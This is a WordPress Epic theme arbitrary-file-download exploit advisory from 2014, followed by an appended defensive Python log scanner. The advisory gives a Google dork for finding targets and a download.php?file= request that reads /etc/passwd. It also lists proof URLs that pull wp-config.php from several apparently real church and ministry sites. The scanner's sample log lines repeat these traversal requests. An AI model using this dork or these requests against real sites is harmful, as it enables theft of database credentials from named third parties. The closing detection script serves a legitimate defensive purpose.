|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: WordPress Epic theme Arbitrary File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/epic
|
|[*] Date: 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://www.organizedthemes.com/epic
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/epic/includes/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://www.lagXunabaptist.org/wp-content/themes/epic/includes/download.php?file=/home/content/46/8992446/html/wp-config.php
|
|[*]
http://doveeXtown.org/wp-content/themes/epic/includes/download.php?file=/home/content/03/10398303/html/wp-config.php
|
|[*]
http://verdeXbaptist.com/wp/wp-content/themes/epic/includes/download.php?file=/home/content/44/2981244/html/wp/wp-config.php
|
|[*]
http://kespXres.ca/wp-content/themes/epic/includes/download.php?file=/home/content/30/10806230/html/wp-config.php
|
|[*]
http://kimberlywilliamsXministries.org/wp-content/themes/epic/includes/download.php?file=/home2/praise11/public_html/wp-config.php
|
|-------------------------------------------------------------------------|
|[*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
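
Added example (not part of the original advisory or the theme's code): a log-review script for defenders that flags requests to the download.php endpoint named under "Location" whose file parameter carries an absolute path, directory traversal, or a sensitive file name. The combined access-log format is an assumption, and the log lines, client addresses and brochure.pdf request are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script path from the advisory's "Location" line; endswith() below also
# covers installs in a subdirectory such as /wp/.
ENDPOINT = "/wp-content/themes/epic/includes/download.php"
# Assumed combined log format: client ... "METHOD target HTTP/x" status
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Sep/2014:10:00:01 +0000] "GET /wp-content/themes/epic/includes/download.php?file=/etc/passwd HTTP/1.1" 200 1432',
    '192.0.2.11 - - [07/Sep/2014:10:00:05 +0000] "GET /wp/wp-content/themes/epic/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 3120',
    '198.51.100.7 - - [07/Sep/2014:10:01:00 +0000] "GET /wp-content/themes/epic/includes/download.php?file=brochure.pdf HTTP/1.1" 200 88211',
    '198.51.100.8 - - [07/Sep/2014:10:02:00 +0000] "GET /index.php?file=/etc/passwd HTTP/1.1" 404 210',
]

def fully_decode(value):
    """Undo repeated percent-encoding (e.g. %252e) so checks see the real path."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return why a file= value is suspicious, or None if it looks benign."""
    v = fully_decode(value).replace("\\", "/")
    if v.startswith("/") or re.match(r"^[A-Za-z]:/", v):
        return "absolute path"
    if ".." in v.split("/"):
        return "directory traversal"
    if v.lower().endswith((".php", "passwd", ".htaccess")):
        return "sensitive file"
    return None

def scan(lines):
    """Return (client, file value, HTTP status, reason) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(ENDPOINT):
            continue
        for value in parse_qs(url.query).get("file", []):
            reason = classify(value)
            if reason:
                hits.append((client, fully_decode(value), int(status), reason))
    return hits
```

A hit with status 200 means the server answered the request, so any file named in it (wp-config.php in particular) should be treated as disclosed and its credentials rotated.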